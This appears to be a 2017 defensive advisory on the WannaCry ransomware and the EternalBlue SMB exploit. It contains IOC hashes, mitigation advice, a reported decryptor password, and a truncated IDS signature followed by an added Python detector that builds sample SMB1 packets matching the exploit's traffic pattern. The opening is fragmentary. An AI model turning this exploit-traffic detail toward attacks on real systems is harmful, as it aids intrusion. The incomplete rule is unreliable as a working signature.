# Signature triggers on Trans2 Setup Request with MultiplexID - 65 - Another unusual MID - Only triggers if 64 was seen previously.
alert tcp $HOME_NET any -> any any (msg:"EXPLOIT Possible ETERNALBLUE SMB Exploit Attempt Stage 2/2 - Trans2 SUCCESS MultiplexID = 65 - MS17-010"; flow:to_server,established; content:"|FF|SMB|32 00 00 00 00|"; offset:4; depth:9;
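The rules above anchor on fixed SMB1 header offsets: `|FF|SMB|` plus the Command byte and NTSTATUS at packet offset 4 (after the 4-byte NetBIOS session header), and the 2-byte MultiplexID at offset 34 (distance 21 from the end of the first match). As an added example that is not part of the report or of the xNymia rule set, the following Python reproduces those checks as a small stateful detector over constructed SMB1 messages; the flow key and the `to_server` flag stand in for Suricata's flow tracking and the SMB.v1.AndX.MID.64 flowbit.

```python
import struct

# SMB1 header layout after the 4-byte NetBIOS session header (MS-CIFS 2.2.3.1).
SMB1_MAGIC = b"\xffSMB"
CMD_TRANS2 = 0x32
CMD_TREE_CONNECT_ANDX = 0x75
STATUS_NOT_IMPLEMENTED = 0xC0000002   # "02 00 00 c0" on the wire (little-endian NTSTATUS)


def parse_smb1(packet):
    """Return (command, status, mid) from a NetBIOS-framed SMB1 message, or None."""
    if len(packet) < 36 or packet[4:8] != SMB1_MAGIC:
        return None
    command = packet[8]                                   # rule: byte after |FF|SMB|
    status = struct.unpack_from("<I", packet, 9)[0]       # rule: next 4 bytes
    mid = struct.unpack_from("<H", packet, 34)[0]         # rule: distance:21; within:23
    return command, status, mid


def build_smb1(command, status, mid):
    """Constructed message for testing: NetBIOS header + 32-byte SMB1 header, no body."""
    hdr = SMB1_MAGIC + bytes([command]) + struct.pack("<I", status) + bytes(21) + struct.pack("<H", mid)
    return b"\x00" + len(hdr).to_bytes(3, "big") + hdr


class EternalBlueDetector:
    """Stateful check mirroring the MID-based rules; flow keys replace Suricata flowbits."""

    def __init__(self):
        self.stage1_flows = set()   # flows where SMB.v1.AndX.MID.64 would have been set

    def inspect(self, flow, packet, to_server):
        parsed = parse_smb1(packet)
        if parsed is None:
            return None
        command, status, mid = parsed
        if to_server:
            if command == CMD_TREE_CONNECT_ANDX and status == 0 and mid == 0x40:
                self.stage1_flows.add(flow)
                return "stage 1/2: Tree Connect AndX with MID=64"
            if command == CMD_TRANS2 and status == 0 and mid == 0x41 and flow in self.stage1_flows:
                return "stage 2/2: Trans2 with MID=65 after MID=64"
        elif command == CMD_TRANS2 and status == STATUS_NOT_IMPLEMENTED and mid in (0x51, 0x52):
            return "response: Trans2 STATUS_NOT_IMPLEMENTED with MID=%d" % mid
        return None


def demo():
    """Run a constructed client/server sequence through the detector (sample data, not a capture)."""
    det, flow = EternalBlueDetector(), ("10.0.0.5:49152", "10.0.0.9:445")
    sequence = [(True, build_smb1(CMD_TRANS2, 0, 0x41)),                    # MID=65 before MID=64: ignored
                (True, build_smb1(CMD_TREE_CONNECT_ANDX, 0, 0x40)),
                (True, build_smb1(CMD_TRANS2, 0, 0x41)),
                (False, build_smb1(CMD_TRANS2, STATUS_NOT_IMPLEMENTED, 0x52))]
    return [det.inspect(flow, msg, to_server) for to_server, msg in sequence]
```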

Overview

On Friday, May 12th, an attack against the United Kingdom National Health Service (NHS) and the Spain-based telecommunications company Telefonica was made public. Reports now show that both organizations have been hit with the WCrypt (WanaCrypt0r 2.0) crypto-ransomware. The attack is being carried out using the recently leaked Eternal Blue exploit, part of the exploit kit released in the ShadowBrokers dump from the compromise of the National Security Agency (NSA). The exploit has been weaponized as a worm using a previously unpatched SMB vulnerability. Infections have also been verified in the US; while data is still filtering in, early reports indicate FedEx is among the first US businesses compromised.

WCrypt Data

WCrypt is a standard crypto-ransomware which, once on the user’s system, encrypts the user’s files with the threat of deletion of the encryption keys if the user does not pay the ransom within seven days. With this variant, the ransom is demanded within 3 days or the ransom amount doubles, and within 7 days if the ransom isn’t paid, the encryption keys are deleted rendering all encrypted data unrecoverable.

Recognizing WCrypt Infections

The infection stems from a file named wannacry.exe. Its hashes are listed below:

SHA256:

  • 2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d
  • 4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79
  • 09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa
  • 24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c
  • 2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd

SHA1:

  • 45356a9dd616ed7161a3b9192e2f318d0ab5ad10
  • 51e4307093f8ca8854359c0ac882ddca427a813c

MD5:

  • 509c41ec97bb81b0567b059aa2f50fe8
  • 7bf2b57f2a205768755c07f238fb32cc
  • 7f7ccaa16fb15eb1c7399d422f8363e8

Once a system is infected with the ransomware, a screen similar to the following image appears, informing the user of the infection as well as the ransom price and the Bitcoin address where payment can be made.

WCrypt

The infection also typically spawns a large number of processes which are the result of the encryption process as well as the desktop theme changes and the decryptor listener.

Infection Vector: Eternal Blue

In the latest dump of the ShadowBrokers' exploits, Eternal Blue was considered especially dangerous due to its use of SMB v1 as the attack vector. The underlying vulnerabilities were assigned CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146 and CVE-2017-0147; they offer multiple avenues of attack, and most Windows operating systems are vulnerable. This has been confirmed as the method of infection by multiple sources, including Matthew Hickey, aka HackerFantastic, a renowned malware and security researcher. Of particular note is the presence of worm characteristics in the delivery: once infected, a system becomes part of the botnet pushing the malware out.

Identifying Eternal Blue and the WCrypt Attack

A recently released screenshot, from malware researcher Kafiene, displays the traffic patterns for the Eternal Blue exploit.

Wcrypt Logs

As is evident in the image, most traffic is seen on port 445, which is the standard port used by SMB v1 and v2. Network monitoring is essential to identify threats as they appear.

Mitigation

In order to mitigate this attack, it is recommended that:

  • All systems be updated to the latest patch available from Microsoft. The patch specific to this exploit is labeled KB4012598 or MS17-010 and should be evaluated for deployment immediately if it has not already been applied. This prevents the SMB traffic from exploiting the vulnerability and eliminates this initial infection vector.
  • Application whitelisting be applied to prevent any applications from running which are not from a specified location or signed by the whitelisted vendor.
  • You create and maintain offline backups of critical data, which will reduce the amount of damage a crypto-ransomware attack is capable of inflicting.
  • You ensure your antivirus definitions are up to date. Most major anti-virus vendors have been provided samples of this malware and have developed detections and definitions. Currently, approximately 31 out of 60 A/V vendors tested can recognize and stop this infection. Major vendors not included in the list include Symantec and Sophos.

Matthew Hickey of Hacker House discovered the decryption binary in a zip file in the PE resources which is encrypted with the password of WNcry@2ol7. This can be used to potentially decrypt the files which were affected by the malware.

Final Analysis

The infections which have been occurring lead vSOC to believe these are not necessarily targeted attacks, rather the infection vectors are exploited automatically by the Eternal Blue exploit kit against vulnerable systems within the enterprise.

References:
